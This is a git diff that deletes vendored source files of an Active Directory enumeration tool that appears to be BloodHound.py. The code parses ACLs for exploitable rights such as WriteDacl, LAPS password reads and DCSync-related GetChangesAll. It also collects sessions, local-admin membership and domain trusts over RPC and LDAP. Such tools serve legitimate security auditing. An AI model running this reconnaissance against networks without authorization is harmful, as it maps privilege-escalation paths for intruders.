EXTRIGHTS_GUID_MAPPING['WriteMember']): - relations.append(build_relation(sid, 'WriteProperty', 'AddMember', inherited=is_inherited)) - - # Property read privileges - if ace_object.acedata.mask.has_priv(ACCESS_MASK.ADS_RIGHT_DS_READ_PROP): - if entrytype == 'computer' and \ - ace_object.acedata.has_flag(ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT) and \ - entry['Properties']['haslaps']: - if ace_object.acedata.get_object_type().lower() == objecttype_guid_map['ms-mcs-admpwd']: - relations.append(build_relation(sid, 'ReadLAPSPassword', inherited=is_inherited)) - - # Extended rights - control_access = ace_object.acedata.mask.has_priv(ACCESS_MASK.ADS_RIGHT_DS_CONTROL_ACCESS) - if control_access: - # All Extended - if entrytype in ['user', 'domain', 'computer'] and not ace_object.acedata.has_flag(ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT): - relations.append(build_relation(sid, 'ExtendedRight', 'All', inherited=is_inherited)) - if entrytype == 'domain' and has_extended_right(ace_object, EXTRIGHTS_GUID_MAPPING['GetChanges']): - relations.append(build_relation(sid, 'ExtendedRight', 'GetChanges', inherited=is_inherited)) - if entrytype == 'domain' and has_extended_right(ace_object, EXTRIGHTS_GUID_MAPPING['GetChangesAll']): - relations.append(build_relation(sid, 'ExtendedRight', 'GetChangesAll', inherited=is_inherited)) - if entrytype == 'user' and has_extended_right(ace_object, EXTRIGHTS_GUID_MAPPING['UserForceChangePassword']): - relations.append(build_relation(sid, 'ExtendedRight', 'User-Force-Change-Password', inherited=is_inherited)) - - # print(ace_object.acedata.sid) - if ace_object.ace.AceType == 0x00: - is_inherited = ace_object.has_flag(ACE.INHERITED_ACE) - mask = ace_object.acedata.mask - # ACCESS_ALLOWED_ACE - if mask.has_priv(ACCESS_MASK.GENERIC_ALL): - # Generic all includes all other rights, so skip from here - relations.append(build_relation(sid, 'GenericAll', inherited=is_inherited)) - continue - - if 
mask.has_priv(ACCESS_MASK.ADS_RIGHT_DS_WRITE_PROP): - # Genericwrite is only for properties, don't skip after - relations.append(build_relation(sid, 'GenericWrite', inherited=is_inherited)) - - if mask.has_priv(ACCESS_MASK.WRITE_OWNER): - relations.append(build_relation(sid, 'WriteOwner', inherited=is_inherited)) - - # For users and domain, check extended rights - if entrytype in ['user', 'domain'] and mask.has_priv(ACCESS_MASK.ADS_RIGHT_DS_CONTROL_ACCESS): - relations.append(build_relation(sid, 'ExtendedRight', 'All', inherited=is_inherited)) - - if mask.has_priv(ACCESS_MASK.WRITE_DACL): - relations.append(build_relation(sid, 'WriteDacl', inherited=is_inherited)) - - # pprint.pprint(entry) - # pprint.pprint(relations) - return entry, relations - -def can_write_property(ace_object, binproperty): - ''' - Checks if the access is sufficient to write to a specific property. - This can either be because we have the right ADS_RIGHT_DS_WRITE_PROP and the correct GUID - is set in ObjectType, or if we have the ADS_RIGHT_DS_WRITE_PROP right and the ObjectType - is empty, in which case we can write to any property. This is documented in - [MS-ADTS] section 5.1.3.2: https://msdn.microsoft.com/en-us/library/cc223511.aspx - ''' - if not ace_object.acedata.mask.has_priv(ACCESS_MASK.ADS_RIGHT_DS_WRITE_PROP): - return False - if not ace_object.acedata.has_flag(ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT): - # No ObjectType present - we have generic access on all properties - return True - # Both are binary here - if ace_object.acedata.data.ObjectType == binproperty: - return True - return False - -def has_extended_right(ace_object, binrightguid): - ''' - Checks if the access is sufficient to control the right with the given GUID. - This can either be because we have the right ADS_RIGHT_DS_CONTROL_ACCESS and the correct GUID - is set in ObjectType, or if we have the ADS_RIGHT_DS_CONTROL_ACCESS right and the ObjectType - is empty, in which case we have all extended rights. 
This is documented in - [MS-ADTS] section 5.1.3.2: https://msdn.microsoft.com/en-us/library/cc223511.aspx - ''' - if not ace_object.acedata.mask.has_priv(ACCESS_MASK.ADS_RIGHT_DS_CONTROL_ACCESS): - return False - if not ace_object.acedata.has_flag(ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT): - # No ObjectType present - we have all extended rights - return True - # Both are binary here - if ace_object.acedata.data.ObjectType == binrightguid: - return True - return False - -def ace_applies(ace_guid, object_class, objecttype_guid_map): - ''' - Checks if an ACE applies to this object (based on object classes). - Note that this function assumes you already verified that InheritedObjectType is set (via the flag). - If this is not set, the ACE applies to all object types. - ''' - if ace_guid == objecttype_guid_map[object_class]: - return True - # If none of these match, the ACE does not apply to this object - return False - -def build_relation(sid, relation, acetype='', inherited=False): - return {'rightname': relation, 'sid': sid, 'acetype': acetype, 'inherited': inherited} - -class AclEnumerator(object): - """ - Helper class for ACL parsing. - """ - def __init__(self, addomain, addc, collect): - self.addomain = addomain - self.addc = addc - # Store collection methods specified - self.collect = collect - self.pool = None - - def init_pool(self): - self.pool = Pool() - -""" -The following is Security Descriptor parsing using cstruct -Thanks to Erik Schamper for helping me implement this! 
-""" -cdef = native_str(""" -struct SECURITY_DESCRIPTOR { - uint8 Revision; - uint8 Sbz1; - uint16 Control; - uint32 OffsetOwner; - uint32 OffsetGroup; - uint32 OffsetSacl; - uint32 OffsetDacl; -}; - -struct LDAP_SID_IDENTIFIER_AUTHORITY { - char Value[6]; -}; - -struct LDAP_SID { - uint8 Revision; - uint8 SubAuthorityCount; - LDAP_SID_IDENTIFIER_AUTHORITY IdentifierAuthority; - uint32 SubAuthority[SubAuthorityCount]; -}; - -struct ACL { - uint8 AclRevision; - uint8 Sbz1; - uint16 AclSize; - uint16 AceCount; - uint16 Sbz2; - char Data[AclSize - 8]; -}; - -struct ACE { - uint8 AceType; - uint8 AceFlags; - uint16 AceSize; - char Data[AceSize - 4]; -}; - -struct ACCESS_ALLOWED_ACE { - uint32 Mask; - LDAP_SID Sid; -}; - -struct ACCESS_ALLOWED_OBJECT_ACE { - uint32 Mask; - uint32 Flags; - char ObjectType[Flags & 1 * 16]; - char InheritedObjectType[Flags & 2 * 8]; - LDAP_SID Sid; -}; -""") -c_secd = cstruct() -c_secd.load(cdef, compiled=True) - - -class SecurityDescriptor(object): - def __init__(self, fh): - self.fh = fh - self.descriptor = c_secd.SECURITY_DESCRIPTOR(fh) - - self.owner_sid = b'' - self.group_sid = b'' - self.sacl = b'' - self.dacl = b'' - - if self.descriptor.OffsetOwner != 0: - fh.seek(self.descriptor.OffsetOwner) - self.owner_sid = LdapSid(fh=fh) - - if self.descriptor.OffsetGroup != 0: - fh.seek(self.descriptor.OffsetGroup) - self.group_sid = LdapSid(fh=fh) - - if self.descriptor.OffsetSacl != 0: - fh.seek(self.descriptor.OffsetSacl) - self.sacl = ACL(fh) - - if self.descriptor.OffsetDacl != 0: - fh.seek(self.descriptor.OffsetDacl) - self.dacl = ACL(fh) - - -class LdapSid(object): - def __init__(self, fh=None, in_obj=None): - if fh: - self.fh = fh - self.ldap_sid = c_secd.LDAP_SID(fh) - else: - self.ldap_sid = in_obj - - def __repr__(self): - return "S-{}-{}-{}".format(self.ldap_sid.Revision, bytearray(self.ldap_sid.IdentifierAuthority.Value)[5], "-".join(['{:d}'.format(v) for v in self.ldap_sid.SubAuthority])) - - -class ACL(object): - def 
__init__(self, fh): - self.fh = fh - self.acl = c_secd.ACL(fh) - self.aces = [] - - buf = BytesIO(self.acl.Data) - for i in range(self.acl.AceCount): - self.aces.append(ACE(buf)) - - -class ACCESS_ALLOWED_ACE(object): - def __init__(self, fh): - self.fh = fh - self.data = c_secd.ACCESS_ALLOWED_ACE(fh) - self.sid = LdapSid(in_obj=self.data.Sid) - self.mask = ACCESS_MASK(self.data.Mask) - - def __repr__(self): - return "" % (str(self.sid), str(self.mask)) - -class ACCESS_DENIED_ACE(ACCESS_ALLOWED_ACE): - pass - - -class ACCESS_ALLOWED_OBJECT_ACE(object): - # Flag constants - ACE_OBJECT_TYPE_PRESENT = 0x01 - ACE_INHERITED_OBJECT_TYPE_PRESENT = 0x02 - - def __init__(self, fh): - self.fh = fh - self.data = c_secd.ACCESS_ALLOWED_OBJECT_ACE(fh) - self.sid = LdapSid(in_obj=self.data.Sid) - self.mask = ACCESS_MASK(self.data.Mask) - - def has_flag(self, flag): - return self.data.Flags & flag == flag - - def get_object_type(self): - if self.has_flag(self.ACE_OBJECT_TYPE_PRESENT): - return bin_to_string(self.data.ObjectType) - return None - - def get_inherited_object_type(self): - if self.has_flag(self.ACE_INHERITED_OBJECT_TYPE_PRESENT): - return bin_to_string(self.data.InheritedObjectType) - return None - - def __repr__(self): - out = [] - for name, value in iteritems(vars(ACCESS_ALLOWED_OBJECT_ACE)): - if not name.startswith('_') and type(value) is int and self.has_flag(value): - out.append(name) - data = (' | '.join(out), - str(self.sid), - str(self.mask), - self.get_object_type(), - self.get_inherited_object_type()) - return "" % data - -class ACCESS_DENIED_OBJECT_ACE(ACCESS_ALLOWED_OBJECT_ACE): - pass - - -""" -ACCESS_MASK as described in 2.4.3 -https://msdn.microsoft.com/en-us/library/cc230294.aspx -""" -class ACCESS_MASK(object): - # Flag constants - - # These constants are only used when WRITING - # and are then translated into their actual rights - SET_GENERIC_READ = 0x80000000 - SET_GENERIC_WRITE = 0x04000000 - SET_GENERIC_EXECUTE = 0x20000000 - SET_GENERIC_ALL = 
0x10000000 - # When reading, these constants are actually represented by - # the following for Active Directory specific Access Masks - # Reference: https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2 - GENERIC_READ = 0x00020094 - GENERIC_WRITE = 0x00020028 - GENERIC_EXECUTE = 0x00020004 - GENERIC_ALL = 0x000F01FF - - # These are actual rights (for all ACE types) - MAXIMUM_ALLOWED = 0x02000000 - ACCESS_SYSTEM_SECURITY = 0x01000000 - SYNCHRONIZE = 0x00100000 - WRITE_OWNER = 0x00080000 - WRITE_DACL = 0x00040000 - READ_CONTROL = 0x00020000 - DELETE = 0x00010000 - - # ACE type specific mask constants (for ACCESS_ALLOWED_OBJECT_ACE) - # Note that while not documented, these also seem valid - # for ACCESS_ALLOWED_ACE types - ADS_RIGHT_DS_CONTROL_ACCESS = 0x00000100 - ADS_RIGHT_DS_CREATE_CHILD = 0x00000001 - ADS_RIGHT_DS_DELETE_CHILD = 0x00000002 - ADS_RIGHT_DS_READ_PROP = 0x00000010 - ADS_RIGHT_DS_WRITE_PROP = 0x00000020 - ADS_RIGHT_DS_SELF = 0x00000008 - - def __init__(self, mask): - self.mask = mask - - def has_priv(self, priv): - return self.mask & priv == priv - - def set_priv(self, priv): - self.mask |= priv - - def remove_priv(self, priv): - self.mask ^= priv - - def __repr__(self): - out = [] - for name, value in iteritems(vars(ACCESS_MASK)): - if not name.startswith('_') and type(value) is int and self.has_priv(value): - out.append(name) - return "" % (self.mask, ' | '.join(out)) - - - -class ACE(object): - CONTAINER_INHERIT_ACE = 0x02 - FAILED_ACCESS_ACE_FLAG = 0x80 - INHERIT_ONLY_ACE = 0x08 - INHERITED_ACE = 0x10 - NO_PROPAGATE_INHERIT_ACE = 0x04 - OBJECT_INHERIT_ACE = 0x01 - SUCCESSFUL_ACCESS_ACE_FLAG = 0x04 - - def __init__(self, fh): - self.fh = fh - self.ace = c_secd.ACE(fh) - self.acedata = None - buf = BytesIO(self.ace.Data) - if self.ace.AceType == 0x00: - # ACCESS_ALLOWED_ACE - self.acedata = ACCESS_ALLOWED_ACE(buf) - elif self.ace.AceType == 0x05: - # ACCESS_ALLOWED_OBJECT_ACE - 
self.acedata = ACCESS_ALLOWED_OBJECT_ACE(buf) - elif self.ace.AceType == 0x01: - # ACCESS_DENIED_ACE - self.acedata = ACCESS_DENIED_ACE(buf) - elif self.ace.AceType == 0x06: - # ACCESS_DENIED_OBJECT_ACE - self.acedata = ACCESS_DENIED_OBJECT_ACE(buf) - # else: - # print 'Unsupported type %d' % self.ace.AceType - - if self.acedata: - self.mask = ACCESS_MASK(self.acedata.data.Mask) - - def __repr__(self): - out = [] - for name, value in iteritems(vars(ACE)): - if not name.startswith('_') and type(value) is int and self.has_flag(value): - out.append(name) - return "" % (self.ace.AceType, ' | '.join(out), self.ace.AceFlags, str(self.acedata)) - - def has_flag(self, flag): - return self.ace.AceFlags & flag == flag diff --git a/external/bloodhound/enumeration/computers.py b/external/bloodhound/enumeration/computers.py deleted file mode 100755 index 77917f7..0000000 --- a/external/bloodhound/enumeration/computers.py +++ /dev/null @@ -1,263 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### -from __future__ import unicode_literals -import queue -import threading -import logging -import traceback -from impacket.dcerpc.v5.rpcrt import DCERPCException -from .outputworker import OutputWorker -from .memberships import MembershipEnumerator -from . .ad.computer import ADComputer -from . .ad.utils import ADUtils -from future.utils import itervalues, iteritems, native_str - -class ComputerEnumerator(MembershipEnumerator): - """ - Class to enumerate computers in the domain. - Contains the threading logic and workers which will call the collection - methods from the bloodhound.ad module. - - This class extends the MembershipEnumerator class just to inherit the - membership lookup functions which are also needed for computers. - """ - def __init__(self, addomain, addc, collect, do_gc_lookup=True): - """ - Computer enumeration. Enumerates all computers in the given domain. - Every domain enumerated will get its own instance of this class. - """ - self.addomain = addomain - self.addc = addc - # Blacklist and whitelist are only used for debugging purposes - self.blacklist = [] - self.whitelist = [] - self.do_gc_lookup = do_gc_lookup - # Store collection methods specified - self.collect = collect - - def enumerate_computers(self, computers, num_workers=10): - """ - Enumerates the computers in the domain. Is threaded, you can specify the number of workers. - Will spawn threads to resolve computers and enumerate the information. 
- """ - process_queue = queue.Queue() - - result_q = queue.Queue() - results_worker = threading.Thread(target=OutputWorker.write_worker, args=(result_q, 'computers.json')) - results_worker.daemon = True - results_worker.start() - logging.info('Starting computer enumeration with %d workers', num_workers) - if len(computers) / num_workers > 500: - logging.info('The workload seems to be rather large. Consider increasing the number of workers.') - for _ in range(0, num_workers): - thread = threading.Thread(target=self.work, args=(process_queue, result_q)) - thread.daemon = True - thread.start() - - for _, computer in iteritems(computers): - if not 'attributes' in computer: - continue - - if 'dNSHostName' not in computer['attributes']: - continue - - hostname = computer['attributes']['dNSHostName'] - if not hostname: - continue - samname = computer['attributes']['sAMAccountName'] - # For debugging purposes only - if hostname in self.blacklist: - logging.info('Skipping computer: %s (blacklisted)', hostname) - continue - if len(self.whitelist) > 0 and hostname not in self.whitelist: - logging.info('Skipping computer: %s (not whitelisted)', hostname) - continue - - process_queue.put((hostname, samname, computer)) - process_queue.join() - result_q.put(None) - result_q.join() - - def process_computer(self, hostname, samname, objectsid, entry, results_q): - """ - Processes a single computer, pushes the results of the computer to the given queue. 
- """ - logging.debug('Querying computer: %s', hostname) - c = ADComputer(hostname=hostname, samname=samname, ad=self.addomain, addc=self.addc, objectsid=objectsid) - c.primarygroup = self.get_primary_membership(entry) - if c.try_connect() == True: - try: - - if 'session' in self.collect: - sessions = c.rpc_get_sessions() - else: - sessions = [] - if 'localadmin' in self.collect: - unresolved = c.rpc_get_group_members(544, c.admins) - c.rpc_resolve_sids(unresolved, c.admins) - if 'rdp' in self.collect: - unresolved = c.rpc_get_group_members(555, c.rdp) - c.rpc_resolve_sids(unresolved, c.rdp) - if 'dcom' in self.collect: - unresolved = c.rpc_get_group_members(562, c.dcom) - c.rpc_resolve_sids(unresolved, c.dcom) - if 'psremote' in self.collect: - unresolved = c.rpc_get_group_members(580, c.psremote) - c.rpc_resolve_sids(unresolved, c.psremote) - if 'loggedon' in self.collect: - loggedon = c.rpc_get_loggedon() - else: - loggedon = [] - if 'experimental' in self.collect: - services = c.rpc_get_services() - tasks = c.rpc_get_schtasks() - else: - services = [] - tasks = [] - - c.rpc_close() - # c.rpc_get_domain_trusts() - - if sessions is None: - sessions = [] - - # Should we use the GC? 
- use_gc = self.addomain.num_domains > 1 and self.do_gc_lookup - - # Process found sessions - for ses in sessions: - # For every session, resolve the SAM name in the GC if needed - domain = self.addomain.domain - try: - users = self.addomain.samcache.get(samname) - except KeyError: - # Look up the SAM name in the GC - entries = self.addomain.objectresolver.resolve_samname(ses['user'], use_gc=use_gc) - if entries is not None: - users = [user['attributes']['objectSid'] for user in entries] - if entries is None or users == []: - logging.warning('Failed to resolve SAM name %s in current forest', samname) - continue - self.addomain.samcache.put(samname, users) - - # Resolve the IP to obtain the host the session is from - try: - target = self.addomain.dnscache.get(ses['source']) - except KeyError: - # TODO: also use discovery based on port 445 connections similar to sharphound - target = ADUtils.ip2host(ses['source'], self.addomain.dnsresolver, self.addomain.dns_tcp) - # Even if the result is the IP (aka could not resolve PTR) we still cache - # it since this result is unlikely to change during this run - self.addomain.dnscache.put_single(ses['source'], target) - if ':' in target: - # IPv6 address, not very useful - continue - if '.' not in target: - logging.debug('Resolved target does not look like an IP or domain. Assuming hostname: %s', target) - target = '%s.%s' % (target, domain) - # Resolve target hostname - try: - hostsid = self.addomain.computersidcache.get(target.lower()) - except KeyError: - logging.warning('Could not resolve hostname to SID: %s', target) - continue - - # Put the result on the results queue. 
- for user in users: - c.sessions.append({'ComputerId':hostsid, 'UserId':user}) - if loggedon is None: - loggedon = [] - - # Put the logged on users on the queue too - for user, userdomain in loggedon: - # Construct fake UPN to cache this user - fupn = '%s@%s' % (user.upper(), userdomain.upper()) - try: - users = self.addomain.samcache.get(fupn) - except KeyError: - entries = self.addomain.objectresolver.resolve_samname(user, use_gc=use_gc) - if entries is not None: - if len(entries) > 1: - for resolved_user in entries: - edn = ADUtils.get_entry_property(resolved_user, 'distinguishedName') - edom = ADUtils.ldap2domain(edn).lower() - if edom == userdomain.lower(): - users = [resolved_user['attributes']['objectSid']] - break - logging.debug('Skipping resolved user %s since domain does not match (%s != %s)', edn, edom, userdomain.lower()) - else: - users = [resolved_user['attributes']['objectSid'] for resolved_user in entries] - if entries is None or users == []: - logging.warning('Failed to resolve SAM name %s in current forest', samname) - continue - self.addomain.samcache.put(fupn, users) - for resultuser in users: - c.sessions.append({'ComputerId':objectsid, 'UserId':resultuser}) - - # Process Tasks - for taskuser in tasks: - c.sessions.append({'ComputerId':objectsid, 'UserId':taskuser}) - - # Process Services - for serviceuser in services: - try: - user = self.addomain.sidcache.get(serviceuser) - except KeyError: - # Resolve UPN in GC - userentry = self.addomain.objectresolver.resolve_upn(serviceuser) - # Resolve it to an entry and store in the cache - self.addomain.sidcache.put(serviceuser, userentry['attributes']['objectSid']) - user = userentry['attributes']['objectSid'] - logging.debug('Resolved Service UPN to SID: %s', user['objectsid']) - c.sessions.append({'ComputerId':objectsid, 'UserId':user}) - - results_q.put(('computer', c.get_bloodhound_data(entry, self.collect))) - - - except DCERPCException: - logging.debug(traceback.format_exc()) - 
logging.warning('Querying computer failed: %s', hostname) - except Exception as e: - logging.error('Unhandled exception in computer %s processing: %s', hostname, str(e)) - logging.info(traceback.format_exc()) - else: - # Write the info we have to the file regardless - try: - results_q.put(('computer', c.get_bloodhound_data(entry, self.collect))) - except Exception as e: - logging.error('Unhandled exception in computer %s processing: %s', hostname, str(e)) - logging.info(traceback.format_exc()) - - def work(self, process_queue, results_q): - """ - Work function, will obtain work from the given queue and will push results on the results_q. - """ - logging.debug('Start working') - - while True: - hostname, samname, entry = process_queue.get() - objectsid = entry['attributes']['objectSid'] - logging.info('Querying computer: %s', hostname) - self.process_computer(hostname, samname, objectsid, entry, results_q) - process_queue.task_done() diff --git a/external/bloodhound/enumeration/domains.py b/external/bloodhound/enumeration/domains.py deleted file mode 100755 index 23d5e04..0000000 --- a/external/bloodhound/enumeration/domains.py +++ /dev/null @@ -1,137 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. 
-# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### - -import logging -import codecs -import json -from . .ad.utils import ADUtils, AceResolver -from . .ad.trusts import ADDomainTrust -from .acls import parse_binary_acl - -class DomainEnumerator(object): - """ - Class to enumerate trusts in the domain. - Contains the dumping functions which - methods from the bloodhound.ad module. - """ - def __init__(self, addomain, addc): - """ - Trusts enumeration. Enumerates all trusts between the source domain - and other domains/forests. - """ - self.addomain = addomain - self.addc = addc - - def dump_domain(self, collect, filename='domains.json'): - """ - Dump trusts. This is currently the only domain info we support, so - this function handles the entire domain dumping. - """ - if 'trusts' in collect: - entries = self.addc.get_trusts() - else: - entries = [] - - try: - logging.debug('Opening file for writing: %s' % filename) - out = codecs.open(filename, 'w', 'utf-8') - except: - logging.warning('Could not write file: %s' % filename) - return - - # If the logging level is DEBUG, we ident the objects - if logging.getLogger().getEffectiveLevel() == logging.DEBUG: - indent_level = 1 - else: - indent_level = None - - # Todo: fix this properly. 
Current code is quick fix to work with domains - # that have custom casing in their DN - domain_object = None - for domain in self.addomain.domains.keys(): - if domain.lower() == self.addomain.baseDN.lower(): - domain_object = self.addomain.domains[domain] - break - - if not domain_object: - logging.error('Could not find domain object. Aborting domain enumeration') - return - - # Initialize json structure - datastruct = { - "domains": [], - "meta": { - "type": "domains", - "count": 0, - "version":3 - } - } - # Get functional level - level_id = ADUtils.get_entry_property(domain_object, 'msds-behavior-version') - try: - functional_level = ADUtils.FUNCTIONAL_LEVELS[int(level_id)] - except KeyError: - functional_level = 'Unknown' - - domain = { - "ObjectIdentifier": domain_object['attributes']['objectSid'], - "Properties": { - "name": self.addomain.domain.upper(), - "domain": self.addomain.domain.upper(), - "highvalue": True, - "objectid": ADUtils.get_entry_property(domain_object, 'objectSid'), - "distinguishedname": ADUtils.get_entry_property(domain_object, 'distinguishedName'), - "description": ADUtils.get_entry_property(domain_object, 'description'), - "functionallevel": functional_level - }, - "Trusts": [], - "Aces": [], - # The below is all for GPO collection, unsupported as of now. 
- "Links": [], - "Users": [], - "Computers": [], - "ChildOus": [] - } - - if 'acl' in collect: - resolver = AceResolver(self.addomain, self.addomain.objectresolver) - _, aces = parse_binary_acl(domain, 'domain', ADUtils.get_entry_property(domain_object, 'nTSecurityDescriptor'), self.addc.objecttype_guid_map) - domain['Aces'] = resolver.resolve_aces(aces) - - if 'trusts' in collect: - num_entries = 0 - for entry in entries: - num_entries += 1 - trust = ADDomainTrust(ADUtils.get_entry_property(entry, 'name'), ADUtils.get_entry_property(entry, 'trustDirection'), ADUtils.get_entry_property(entry, 'trustType'), ADUtils.get_entry_property(entry, 'trustAttributes'), ADUtils.get_entry_property(entry, 'securityIdentifier')) - domain['Trusts'].append(trust.to_output()) - - logging.info('Found %u trusts', num_entries) - - # Single domain only - datastruct['meta']['count'] = 1 - datastruct['domains'].append(domain) - json.dump(datastruct, out, indent=indent_level) - - logging.debug('Finished writing domain info') - out.close() diff --git a/external/bloodhound/enumeration/memberships.py b/external/bloodhound/enumeration/memberships.py deleted file mode 100755 index 9b3061c..0000000 --- a/external/bloodhound/enumeration/memberships.py +++ /dev/null @@ -1,493 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. 
-# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### - -import logging -import queue -import threading -from . .ad.utils import ADUtils, AceResolver -from . .ad.computer import ADComputer -from .acls import AclEnumerator, parse_binary_acl -from .outputworker import OutputWorker - -class MembershipEnumerator(object): - """ - Class to enumerate memberships in the domain. - Contains the dumping functions which - methods from the bloodhound.ad module. - """ - def __init__(self, addomain, addc, collect, disable_pooling): - """ - Membership enumeration. Enumerates all groups/users/other memberships. 
- """ - self.addomain = addomain - self.addc = addc - # Store collection methods specified - self.collect = collect - self.disable_pooling = disable_pooling - self.aclenumerator = AclEnumerator(addomain, addc, collect) - self.aceresolver = AceResolver(addomain, addomain.objectresolver) - self.result_q = None - - def get_membership(self, member): - """ - Attempt to resolve the membership (DN) of a group to an object - """ - # First assume it is a user - try: - resolved_entry = self.addomain.users[member] - except KeyError: - # Try if it is a group - try: - resolved_entry = self.addomain.groups[member] - except KeyError: - # Try if it is a computer - try: - entry = self.addomain.computers[member] - # Computers are stored as raw entries - resolved_entry = ADUtils.resolve_ad_entry(entry) - except KeyError: - use_gc = ADUtils.ldap2domain(member) != self.addomain.domain - qobject = self.addomain.objectresolver.resolve_distinguishedname(member, use_gc=use_gc) - if qobject is None: - return None - resolved_entry = ADUtils.resolve_ad_entry(qobject) - # Store it in the cache - if resolved_entry['type'] == 'user': - self.addomain.users[member] = resolved_entry - if resolved_entry['type'] == 'group': - self.addomain.groups[member] = resolved_entry - # Computers are stored as raw entries - if resolved_entry['type'] == 'computer': - self.addomain.computers[member] = qobject - return { - "MemberId": resolved_entry['objectid'], - "MemberType": resolved_entry['type'].capitalize() - } - - @staticmethod - def get_primary_membership(entry): - """ - Construct primary membership from RID to SID (BloodHound 3.0 only) - """ - try: - primarygroupid = int(entry['attributes']['primaryGroupID']) - except (TypeError, KeyError): - # Doesn't have a primarygroupid, means it is probably a Group instead of a user - return None - return '%s-%d' % ('-'.join(entry['attributes']['objectSid'].split('-')[:-1]), primarygroupid) - - @staticmethod - def add_user_properties(user, entry): - """ - Resolve 
properties for user objects - """ - props = user['Properties'] - # print entry - # Is user enabled? Checked by seeing if the UAC flag 2 (ACCOUNT_DISABLED) is not set - props['enabled'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 2 == 0 - props['lastlogon'] = ADUtils.win_timestamp_to_unix( - ADUtils.get_entry_property(entry, 'lastLogon', default=0, raw=True) - ) - if props['lastlogon'] == 0: - props['lastlogon'] = -1 - props['lastlogontimestamp'] = ADUtils.win_timestamp_to_unix( - ADUtils.get_entry_property(entry, 'lastlogontimestamp', default=0, raw=True) - ) - if props['lastlogontimestamp'] == 0: - props['lastlogontimestamp'] = -1 - props['pwdlastset'] = ADUtils.win_timestamp_to_unix( - ADUtils.get_entry_property(entry, 'pwdLastSet', default=0, raw=True) - ) - props['dontreqpreauth'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00400000 == 0x00400000 - props['pwdneverexpires'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00010000 == 0x00010000 - props['sensitive'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00100000 == 0x00100000 - props['serviceprincipalnames'] = ADUtils.get_entry_property(entry, 'servicePrincipalName', []) - props['hasspn'] = len(props['serviceprincipalnames']) > 0 - props['displayname'] = ADUtils.get_entry_property(entry, 'displayName') - props['email'] = ADUtils.get_entry_property(entry, 'mail') - props['title'] = ADUtils.get_entry_property(entry, 'title') - props['homedirectory'] = ADUtils.get_entry_property(entry, 'homeDirectory') - props['description'] = ADUtils.get_entry_property(entry, 'description') - props['userpassword'] = ADUtils.get_entry_property(entry, 'userPassword') - props['admincount'] = ADUtils.get_entry_property(entry, 'adminCount', 0) == 1 - if len(ADUtils.get_entry_property(entry, 'msDS-AllowedToDelegateTo', [])) > 0: - props['allowedtodelegate'] = ADUtils.get_entry_property(entry, 'msDS-AllowedToDelegateTo', []) 
